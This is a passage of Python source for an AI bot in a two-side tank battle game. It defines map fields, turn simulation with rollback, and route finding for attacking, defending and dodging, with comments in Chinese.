self._side) class TankField(Field): def __init__(self, x, y, side, id): super().__init__(x, y, Field.TANK) self._side = side self._id = id self.previousAction = Action.DUMMY @property def side(self): return self._side @property def id(self): return self._id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side, self._id) # const BASE_FIELD_TYPES = ( Field.BASE, Field.BLUE_BASE, Field.RED_BASE ) TANK_FIELD_TYPES = ( Field.TANK, Field.BLUE_TANK, Field.RED_TANK, Field.MULTI_TANK ) #{ END 'field.py' }# #{ BEGIN 'map_.py' }# class Map(object): def __init__(self, width, height): self._width = width self._height = height self._content = [ [[] for x in range(width)] for y in range(height) ] @property def width(self): return self._width @property def height(self): return self._height @property def size(self): return (self._width, self._height) def in_map(self, x, y): """ 判断 (x, y) 坐标是否位于地图内 """ return 0 <= x < self._width and 0 <= y < self._height def __getitem__(self, xy): """ 获得 xy: (x, y) 的内容 """ x, y = xy if not self.in_map(x, y): raise Exception("(%s, %s) is not in map" % (x, y) ) return self._content[y][x] def get_fields(self, x, y): return self[x, y] class Tank2Map(Map, metaclass=SingletonMeta): class _Counter(object): """ 一个用于回滚计数的内部类 """ def __init__(self): self._counter = 0 def increase(self): self._counter += 1 def __iter__(self): return iter(range(self._counter)) def __repr__(self): return self._counter.__repr__() def __int__(self): return self._counter def __init__(self, width, height): super().__init__(width, height) self._tanks = [ [ None for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] self._bases = [ None for _ in range(SIDE_COUNT) ] self._turn = 0 self._destroyedRecords = [] # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) self._previousActions = [] # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 self._performedActionsRecord = {} # turn -> [[int, int], [int, int]] 记录 perform 所执行过的动作,用于 undo_revert self._init_bases() self._init_tanks() # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 def reset(self): # 重置整个地图 self.__clean_cache() width, height = self.size self.__init__(width, height) def __clean_cache(self): # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") pass # 不再使用缓存啦 @property def turn(self): # 当前回合数 return self._turn @property def tanks(self): return self._tanks @property def bases(self): return self._bases #@CachedProperty # 缓存效果不明显 @property def matrix(self): """ 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 """ return self.to_type_matrix() #@CachedProperty # 缓存效果不明显 @property def matrix_T(self): return self.matrix.T def _init_bases(self): """ 初始化基地和基地前的钢墙 """ assert self._width % 2 == 1, "Map width must be odd" xc = self._width // 2 # x-center y1 = 0 y2 = self._height - 1 basePoints = [ (xc, y1), # side 1 蓝方 (xc, y2), # side 2 红方 ] for side, (x, y) in enumerate(basePoints): base = BaseField(x, y, side) self._bases[side] = base self.insert_field(base) def _init_tanks(self): """ 初始化坦克 """ x1, x2 = (2, 6) y1, y2 = (0, self._height-1) tankPoints = [ [ (x1, y1), (x2, y1) ], # side 1 蓝方 左 0 右 1 [ (x2, y2), (x1, y2) ], # side 2 红方 左 1 右 0 ] for side, points in enumerate(tankPoints): tanks = self._tanks[side] for idx, (x, y) in enumerate(points): tank = TankField(x, y, side, idx) self.insert_field(tank) tanks[idx] = tank def insert_field(self, field): self[field.xy].append(field) field.destroyed = False def remove_field(self, field, record=True): self[field.xy].remove(field) field.destroyed = True if record: # 记录被清楚的对象 r = ( self._turn, field.xy, field ) self._destroyedRecords.append(r) def to_type_matrix(self): """ 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T """ width, height = self.size matrix = np.full((height, width), Field.DUMMY, dtype=np.int8) for y in range(height): for x in range(width): fields = self.get_fields(x, y) if len(fields) == 0: matrix[y, x] = Field.EMPTY elif len(fields) > 2: matrix[y, x] = Field.MULTI_TANK # 重合视为一个坦克 else: field = fields[0] if isinstance(field, (BaseField, TankField) ): matrix[y, x] = field.type + 1 + field.side # 遵循 Field 中常数定义的算法 else: matrix[y, x] = field.type return matrix def has_multi_tanks(self, x, y): """ 判断某坐标点是否有多辆坦克堆叠 """ return len( self.get_fields(x, y) ) > 1 def is_valid_move_action(self, tank, action): """ 判断是否为合法的移动行为 """ #assert Action.is_move(action), "action %s is not a move-action" % action if not Action.is_move(action): # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert return False # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 _FIELDS_CAN_MOVE_TO = ( Field.DUMMY, Field.EMPTY ) # 遇到坦克不能移动! x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] x += dx y += dy if not self.in_map(x, y): return False fields = self.get_fields(x, y) if len(fields) == 0: return True elif len(fields) == 1: _type = fields[0].type if _type in _FIELDS_CAN_MOVE_TO: return True return False def is_valid_shoot_action(self, tank, action): """ 判断是否为合法的设计行为 """ # assert Action.is_shoot(action), "action %s is not a shoot-action" % action if not Action.is_shoot(action): return False return not Action.is_shoot(tank.previousAction) # 只要不连续两回合射击都合理 def is_valid_action(self, tank, action): """ 判断是否为合法行为 """ if not Action.is_valid(action): return False elif Action.is_stay(action): return True elif Action.is_move(action): return self.is_valid_move_action(tank, action) elif Action.is_shoot(action): return self.is_valid_shoot_action(tank, action) else: # 未知的行为 raise Exception("unexpected action %s" % action) def perform(self, blue_actions, red_actions): """ 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, int] 红方 0, 1 号坦克将执行的动作 """ self._turn += 1 self.__clean_cache() #debug_print("Start Turn: %s" % self._turn) #self.debug_print_out("") _dx = Action.DIRECTION_OF_ACTION_X _dy = Action.DIRECTION_OF_ACTION_Y _actions = [ blue_actions, red_actions ] self._performedActionsRecord[self._turn] = _actions _fieldsToBeDestroyed = set() # 使用 set 避免重复 # 记录老的 previous actions _oldPreviousActions = [ [ tank.previousAction for tank in tanks ] for tanks in self._tanks ] self._previousActions.append(_oldPreviousActions) # 记录 # 检查 actions 合理性,修改 tank 缓存 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not self.is_valid_action(tank, action): raise Exception("%s will perform an invalid action %s" % (tank, action) ) tank.previousAction = action # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_move(action): self.remove_field(tank) tank.x += _dx[action] tank.y += _dy[action] self.insert_field(tank) # 处理射击行为 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_shoot(action): x, y = tank.xy action -= 4 # 使之与 dx, dy 的 idx 对应 while True: x += _dx[action] y += _dy[action] if not self.in_map(x, y): break currentFields = self.get_fields(x, y) if len(currentFields) == 0: continue elif len(currentFields) > 1: # 必定都是 tank pass else: # len(currentFields) == 1 field = currentFields[0] if isinstance(field, (WaterField, EmptyField)): continue # 跳过水路和空格 elif ( isinstance(field, TankField) and not self.has_multi_tanks(x, y) and not self.has_multi_tanks(*field.xy) ): # 对射判断,此时两方所在格子均都只有一架坦克 oppTank = field oppAction = _actions[oppTank.side][oppTank.id] if ( Action.is_shoot(oppAction) and Action.is_opposite(action, oppAction) ): break # 对射抵消 else: pass # 坦克被摧毁 elif isinstance(field, SteelField): break # 钢墙无法摧毁 elif isinstance(field, (BrickField, BaseField) ): pass # 基地和土墙可以被摧毁 else: raise Exception("unexpected field type") _fieldsToBeDestroyed.update(currentFields) break # 摧毁了第一个遇到的 fields for field in _fieldsToBeDestroyed: self.remove_field(field) #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() def single_simulate(self, tank, action): """ 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 """ actions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] actions[tank.side][tank.id] = action self.perform(*actions) def multi_simulate(self, *actions): """ 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 """ performedActions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] for tank, action in actions: performedActions[tank.side][tank.id] = action self.perform(*performedActions) def revert(self): """ 回滚一回合的行为 Return: - success bool """ if self._turn <= 0: # 可以为 1 ,此时回滚到 Turn 0 的结束点 return False # 这表示回到地图最初的状态 currentTurn = self._turn records = self._destroyedRecords _actions = self._previousActions.pop() for side, tanks in enumerate(self._tanks): # 回滚历史动作 for id_, tank in enumerate(tanks): tank.previousAction = _actions[side][id_] while len(records) > 0: if records[-1][0] == currentTurn: turn, (x, y), field = records.pop() if isinstance(field, TankField): tank = field if not tank.destroyed: # tank 发生移动 self.remove_field(tank, record=False) tank.x = x tank.y = y self.insert_field(tank) else: self.insert_field(field) else: break self._turn -= 1 self.__clean_cache() #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() return True def undo_revert(self): """ 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 """ nextTurn = self._turn + 1 assert nextTurn in self._performedActionsRecord, "no previously revert operation found" actions = self._performedActionsRecord[nextTurn] self.perform(*actions) @contextmanager def simulate_one_action(self, tank, action): """ simulate 的 with 版用法,结束后会自动回滚 """ try: self.single_simulate(tank, action) #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) yield except Exception as e: raise e finally: self.revert() # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) @contextmanager def simulate_multi_actions(self, *actions): """ multi_simulate 的 with 用法 """ try: self.multi_simulate(*actions) yield except Exception as e: raise e finally: self.revert() @contextmanager def rollback_to_previous(self): """ 回滚到先前回合 回滚结束后,会自动撤销回滚 """ try: success = self.revert() yield except Exception as e: raise e finally: if success: self.undo_revert() # 回合结束后撤销回滚 @contextmanager def auto_revert(self): """ 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.simulate 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.revert() @contextmanager def auto_undo_revert(self): """ 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.revert 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.undo_revert() def get_game_result(self): """ 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 """ failed = [ False for _ in range(SIDE_COUNT) ] # 0 蓝方 1 红方 for side in range(SIDE_COUNT): # 坦克全部被消灭 tanks = self._tanks[side] if all(tank.destroyed for tank in tanks): failed[side] = True # 基地被摧毁 baes = self._bases[base] if base.destroyed: failed[side] = True if failed[0] and failed[1]: return GAME_STATUS_DRAW elif not failed[0] and failed[1]: return GAME_STATUS_BLUE_WIN elif failed[0] and not failed[1]: return GAME_STATUS_RED_WIN else: return GAME_STATUS_NOT_OVER def debug_print_out(self, compact=COMPACT_MAP): """ [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 """ if not DEBUG_MODE: return EMPTY_SYMBOL = " " BASE_SYMBOL = "基" BRICK_SYMBOL = "土" STEEL_SYMBOL = "钢" WATER_SYMBOL = "水" BLUE_TANK_SYMBOL = "蓝" RED_TANK_SYMBOL = "红" MULTI_TANK_SYMBOL = "重" UNEXPECTED_SYMBOL = "?" SPACE = " " if not compact else "" _TEXT_WIDTH = (self._width * 2 - 1) if not compact else self._width CUT_OFF_RULE = "=" * _TEXT_WIDTH print_inline = functools.partial(print, end=SPACE) print("\n%s" % CUT_OFF_RULE) if not compact: print("") for y in range(self._height): for x in range(self._width): fields = self._content[y][x] if len(fields) == 0: print_inline(EMPTY_SYMBOL) elif len(fields) > 1: print_inline(MULTI_TANK_SYMBOL) elif len(fields) == 1: field = fields[0] if isinstance(field, EmptyField): print_inline(EMPTY_SYMBOL) elif isinstance(field, BaseField): print_inline(BASE_SYMBOL) elif isinstance(field, BrickField): print_inline(BRICK_SYMBOL) elif isinstance(field, SteelField): print_inline(STEEL_SYMBOL) elif isinstance(field, WaterField): print_inline(WATER_SYMBOL) elif isinstance(field, TankField): tank = field if tank.side == 0: print_inline(BLUE_TANK_SYMBOL) elif tank.side == 1: print_inline(RED_TANK_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) print("\n" if not compact else "") print("%s\n" % CUT_OFF_RULE) #{ END 'map_.py' }# #{ BEGIN 'tank.py' }# class BattleTank(object): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton """ key = (tank.side, tank.id) obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map #self.__attackingRoute = None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self.side, self.id) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def field(self): return self._tank @property def tank(self): return self._tank @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def x(self): return self._tank.x @property def y(self): return self._tank.y @property def xy(self): return self._tank.xy @property def destroyed(self): return self._tank.destroyed @property def canShoot(self): # 本回合是否可以射击 return not Action.is_shoot(self._tank.previousAction) def is_this_field_in_our_site(self, field, include_midline=False): """ 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 """ base = self._map.bases[self.side] if include_midline: return ( np.abs( field.y - base.y ) <= 4 ) else: return ( np.abs( field.y - base.y ) < 4 ) def is_this_field_in_enemy_site(self, field, include_midline=False): # 默认不包含中线 """ 是否处于敌方半边的地图 """ return not self.is_this_field_in_our_site(field, include_midline= not include_midline) def is_in_our_site(self, include_midline=False): """ 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 """ return self.is_this_field_in_our_site(self.tank, include_midline=include_midline) def is_in_enemy_site(self, include_midline=True): """ 是否处于地方半边的地图 """ return self.is_this_field_in_enemy_site(self.tank, include_midline=include_midline) def is_near_midline(self, offset=1): """ 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 """ return ( np.abs( self.y - 4 ) <= offset ) def get_surrounding_empty_field_points(self, **kwargs): """ 获得周围可以移动到达的空位 """ tank = self._tank map_ = self._map x, y = tank.xy points = [] for dx, dy in get_searching_directions(x, y, **kwargs): x3 = x + dx y3 = y + dy if not map_.in_map(x3, y3): continue fields = map_[x3, y3] if len(fields) == 0: points.append( (x3, y3) ) elif len(fields) > 2: continue else: field = fields[0] if isinstance(field, EmptyField): points.append( (x3, y3) ) else: continue return points def get_all_valid_move_actions(self, **kwargs): """ 所有合法的移动行为 """ tank = self._tank map_ = self._map actions = [] x1, y1 = tank.xy for x2, y2 in self.get_surrounding_empty_field_points(**kwargs): moveAction = Action.get_move_action(x1, y1, x2, y2) map_.is_valid_move_action(tank, moveAction) actions.append(moveAction) return actions def get_all_valid_shoot_actions(self): """ 获得所有合法的射击行为 """ if self.canShoot: return list(Action.SHOOT_ACTIONS) else: return [] def get_all_valid_actions(self): """ 获得所有合法的行为 """ return self.get_all_valid_move_actions() + self.get_all_valid_shoot_actions() + [ Action.STAY ] def get_all_shortest_attacking_routes(self, ignore_enemies=True, bypass_enemies=False, delay=0, **kwargs): """ 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] """ if ignore_enemies and bypass_enemies: raise ValueError("you can't think of enemies as steel and air at the same time") map_ = self._map tank = self._tank side = tank.side oppSide = 1- tank.side oppBase = map_.bases[oppSide] if ignore_enemies: matrix_T = fake_map_matrix_T_without_enemy(map_, tank.side) elif bypass_enemies: matrix_T = fake_map_matrix_T_thinking_of_enemy_as_steel(map_, tank.side) else: matrix_T = map_.matrix_T kwargs.setdefault("middle_first", False) # 优先边路搜索 routes = find_all_routes_for_shoot( tank.xy, oppBase.xy, matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, # 队友有可能会变成阻碍! 5cdde41fd2337e01c79f1284 Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, # 不将敌方坦克加入到其中 ), **kwargs) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_attacking_route(self, *args, **kwargs): """ 获得默认的最短攻击路径 """ for route in self.get_all_shortest_attacking_routes(*args, **kwargs): return route # 直接返回第一个 route def get_next_attacking_action(self, route=None): """ 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 """ tank = self._tank map_ = self._map oppBase = map_.bases[1 - tank.side] battler = self if route is None: route = battler.get_shortest_attacking_route() if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): # 但是,如果正前方就是基地,则不移动,只射击 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: continue elif len(fields) > 1: break else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): break # 钢墙不可以射穿 elif isinstance(field, BrickField): # 土墙认为可以射掉 continue elif isinstance(field, TankField): # 坦克也认为可以射掉 if field.side == tank.side: break # 队友坦克不进攻 continue # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 elif field is oppBase: if battler.canShoot: # 这个时候如果能够射击,就优先射击 return action + 4 else: continue # 其他情况仍然优先移动 return action ## 遇到墙/敌方基地/坦克,不能移动 if battler.canShoot: # 尝试射击 action += 4 for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 return action # 不能射击,只好等待 return Action.STAY def get_all_next_attacking_actions(self, routes=None): """ 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] """ if routes is None: routes = self.get_all_shortest_attacking_routes() # 默认用所有最短的进攻路线 return list(set( self.get_next_attacking_action(route) for route in routes )) def get_all_shortest_defensive_routes(self, delay=0, **kwargs): """ 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes """ map_ = self._map tank = self._tank side = tank.side base = map_.bases[side] matrix_T = map_.matrix_T kwargs.setdefault("middle_first", True) routes = find_all_routes_for_move( tank.xy, base.xy, matrix_T, **kwargs, ) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_defensive_route(self, *args, **kwargs): """ 获取默认的最短路线 """ for route in self.get_all_shortest_defensive_routes(*args, **kwargs): return route # 直接返回第一个 def get_next_defensive_action(self, route=None): """ 获得下一个防御动作,不考虑周围敌人 """ tank = self._tank map_ = self._map base = map_.bases[tank.side] if route is None: route = self.get_shortest_defensive_route() if route.is_not_found(): return Action.STAY elif route.length == 0: return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): return action ## 遇到墙/己方基地/坦克,不能移动 if self.canShoot: # 尝试射击 action += 4 for field in self.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 elif isinstance(field, BaseField) and field is base: return Action.STAY # 遇到己方基地 return action # 否则就是等待了 return Action.STAY def get_shortest_route_to_enemy(self, oppTank): """ 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = find_shortest_route_for_shoot( tank.xy, oppTank.xy, map_.matrix_T, # 正常地图 block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, Field.TANK + 1 + oppSide, # 加入地方坦克 ), x_axis_first=True, # 优先左右拦截 ) return route def get_route_to_enemy_by_move(self, oppTank, block_teammate=True, **kwargs): """ 近身条件下,获得到达对方的路劲 """ tank = self._tank map_ = self._map side = tank.side if block_teammate: # 将己方坦克和重叠坦克视为 block block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ) else: block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ) # 优先左右拦截 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, oppTank.xy, map_.matrix_T, block_types=block_types, **kwargs, ) return route def get_route_to_point_by_move(self, x2, y2, **kwargs): """ 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s """ tank = self._tank map_ = self._map side = tank.side # 优先左右移动 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, (x2, y2), map_.matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ), **kwargs, ) return route def get_route_to_field_by_move(self, field, **kwargs): """ 上一个函数的一个简单扩展 """ x2, y2 = field.xy return self.get_route_to_point_by_move(x2, y2, **kwargs) def get_next_hunting_action(self, oppTank): """ 下一个追杀敌军的行为 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = self.get_shortest_route_to_enemy(oppTank) if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明自己和敌方重合,这种情况不应该出现 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 见到敌人就开火,否则移动 shootAction = action + 4 destroyedFields = [] # 会被用到两次,因此缓存一下 if self.canShoot: destroyedFields = self.get_destroyed_fields_if_shoot(action) for field in destroyedFields: if isinstance(field, TankField) and field.side == side: # 有队友,停止射击 break else: # 否则再判断是否应该射击 for field in destroyedFields: if isinstance(field, TankField) and field.side == oppSide: return shootAction # 到此处说明没有敌人,或者有队友 ## 优先移动 if map_.is_valid_move_action(tank, action): return action ## 遇到路障,射击 if self.canShoot: for field in destroyedFields: if isinstance(field, TankField) and field.side == side: return Action.STAY # 遇到队友,等待 return shootAction ## 也不能射击?于是等待 return Action.STAY def get_manhattan_distance_to(self, field): """ 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 """ x1, y1 = self.xy x2, y2 = field.xy return get_manhattan_distance(x1, y1, x2, y2) def get_manhattan_distance_to_point(self, x2, y2): """ 对上一函数的补充,允许传入 xy 作为变量 """ x1, y1 = self.xy return get_manhattan_distance(x1, y1, x2, y2) def get_enemies_around(self): """ 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] """ tank = self._tank map_ = self._map x1, y1 = tank.xy enemies = [] for dx, dy in get_searching_directions(x1, y1): x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break currentFields = map_[x, y] if len(currentFields) == 0: # 没有对象 continue elif len(currentFields) > 1: # 多辆坦克 for field in currentFields: if isinstance(field, TankField) and field.side != tank.side: enemies.append(field) else: # len == 1 field = currentFields[0] if isinstance(field, (EmptyField, WaterField) ): continue elif not isinstance(field, TankField): # 说明这个方向上没有敌人 break elif field.side != tank.side: # 遇到了敌人 enemies.append(field) else: # 遇到了队友 break return enemies def has_enemy_around(self): """ 周围是否存在敌军 """ return len(self.get_enemies_around()) > 0 def has_overlapping_enemy(self): """ 是否与敌方坦克重合 """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: assert isinstance(field, TankField), "unexpected field %r" % field if field.side != tank.side: return True return False def get_overlapping_enemy(self): """ 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: if field.side != tank.side: return field raise Exception("no overlapping enemy was found") def try_dodge(self, oppTank): """ 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 """ tank = self._tank map_ = self._map side = tank.side base = map_.bases[side] oppBase = map_.bases[1- side] teammate = map_.tanks[side][1 - tank.id] battler = self x1, y1 = tank.xy x2, y2 = oppTank.xy if battler.is_in_our_site(): x3, y3 = base.xy # 在本方地盘,优先朝自己基地的方向闪现 else: x3, y3 = oppBase.xy # 在对方地盘,优先朝着对方基地的方向闪现 actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 优先逃跑向对方基地 x4 = x1 + dx y4 = y1 + dy if x4 == x2 or y4 == y2: # 逃跑方向不对 continue action = Action.get_action(x1, y1, x4, y4) if map_.is_valid_move_action(tank, action): actions.append(action) # # 应该朝着远离队友的方向闪避? 5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # '''def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate)''' #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) '''if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions)''' #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! #map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### return actions def can_dodge(self): """ 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 """ tank = self._tank map_ = self._map x, y = self._tank.xy actions = [] for dx, dy in get_searching_directions(x, y): x3 = x + dx y3 = y + dy moveAction = Action.get_action(x, y, x3, y3) if map_.is_valid_move_action(moveAction): actions.append(moveAction) if len(actions) < 2: # 不可能闪避 return False if len(actions) >= 3: # 可以 return True assert len(actions) == 2 return not Action.is_opposite(*actions) # 相反方向,无法闪避,否则可以 def break_brick_for_dodge(self, oppTank): """ 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side base = map_.bases[side] oppBase = map_.bases[oppSide] x1, y1 = tank.xy x2, y2 = oppTank.xy if self.is_in_our_site(): # 选择性同 try_dodge x3, y3 = base.xy else: x3, y3 = oppBase.xy actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 按照惯例,优先凿开移向对方基地的墙 x3 = x1 + dx y3 = y1 + dy if x3 == x2 or y3 == y2: # 方向不对,不能凿开相隔的墙 continue # 需要判断两边的墙壁是否为不可凿开的对象 if not map_.in_map(x3, y3): continue fields = map_[x3, y3] assert len(fields) == 1, "not suit for current situation" field = fields[0] if isinstance(field, BrickField): action = 